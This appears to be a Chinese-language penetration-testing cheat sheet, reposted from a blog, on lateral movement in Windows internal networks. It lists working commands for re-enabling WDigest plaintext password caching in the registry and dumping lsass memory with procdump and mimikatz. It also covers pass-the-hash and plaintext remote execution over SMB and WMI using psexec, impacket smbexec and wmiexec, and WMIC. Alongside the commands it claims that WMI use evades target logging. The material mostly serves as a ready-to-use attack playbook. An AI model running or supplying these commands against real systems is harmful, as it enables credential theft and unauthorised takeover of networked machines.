内网渗透-横向移动(smb&wmi)

Posted 2021-05-18 mrob0t

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了内网渗透-横向移动(smb&wmi)相关的知识，希望对你有一定的参考价值。

内网渗透-横向移动(smb&wmi)

#前置知识点1:

windows 2012以上版本默认关闭wdigest导致无法从内存中获取明文密码

windows 2012以下版本如安装KB2871997补丁同上

针对以上情况，提供了4种方法解决：

1.利用hash传递(pth,ptk等)进行移动

2.利用其他服务协议(smb,wmi)进行移动

3.利用注册表操作开启Wdigest Auth值进行获取

reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
#重启或用户重新登录后可以成功抓取

4.利用工具或第三方平台(Hashcat)进行破解获取

#前置知识点2:

windows系统LM HASH及NTLM Hash加密算法，个人系统在Windows vista后

服务器系统在Windows 2003以后，认证方式均为NTLM Hash

#Procdump+Mimikatz配合获取NTML&hash

#procdump上执行:

procdump -accepteula -ma lsass.exe lsass.dmp

#mimikatz上执行:
sekurlsa::minidump lsass.dmp
sekurlsa::LogonPasswords full

procdump为微软官方软件，不会被杀毒软件拦截，但是生成的dmp文件会。

#SMB服务利用(psexec,smbexec)传递hash

利用条件：445端口开放

#psexec的使用:

情况一:已经建立了$ipc连接

net use \\\\192.168.3.32\\ipc$ "admin!@#45" /user:administrator#建立了ipc连接
psexec \\\\192.168.3.32 -s cmd #-s参数为以system权限运行

情况二:未建立ipc，直接提供明文账号密码(不能直接传递hash)

#明文
psexec \\\\192.168.3.21 -u administrator -p Admin12345 -s cmd
#hash
psexec -hashes :$HASH$ ./administrator@10.1.2.3 #本地admin用户hash传递
psexec -hashes :$HASH$ xxx.com/administrator@10.1.2.3 #域admin用户hash传递
psexec -hashes :518b98ad417a53695dc997aa02d455c xxx.com/administrator@192.168.3.32 #hash传递需要第三方包impacket

#第三方包impacket下的smbexec实现无需ipc链接传递明文或hash

#明文
smbexec god/administrator:Admin12345@192.168.3.21  #域用户
smbexec ./administrator:admin12345@192.168.3.32  #本地用户
#hash
smbexec -hashes :$HASH$ ./administrator@192.168.3.21 #本地用户hash传递
smbexec -hashes :$HASH$ xxx.com/admin@192.168.3.21 #域用户hash传递

smbexec -hashes :518b98ad417a53695dc997aa02d455c 
xxx.com/administrator@192.168.3.32                  #本地用户hash传递
smbexec -hashes :518b98ad417a53695dc997aa02d455c ./administrator@192.168.3.32
#域用户hash传递

#WMI服务利用(cscript,wmiexec,wmic)

WMI(Windows Management Instrumentation)通过135端口进行利用

支持用户名明文或者hash的方式进行认证，并且该方法不会在目标日志系统留下痕迹。

#自带WMIC 明文传递,无回显

wimc /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >c:\\1.txt"

#自带cscript 明文传递,有回显

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

#impacket-wmiexec 明文或hash传递有回显

#明文
wmiexec ./administrator:Admin12345@192.168.3.32 "whoami"    #本地用户
wmiexec xxx.com/administrator:Admin12345@192.168.3.21 "whoami"  #域用户
#hash
wmiexec -hashes :518b98ad417a53695dc997aa02d455 ./administrator@192.168.3.32 "whoami"   #本地用户
wmiexec -hashes :518b98ad417a53695dc997aa02d455 xxx.com/administrator@192.168.3.21 "whoami" #域用户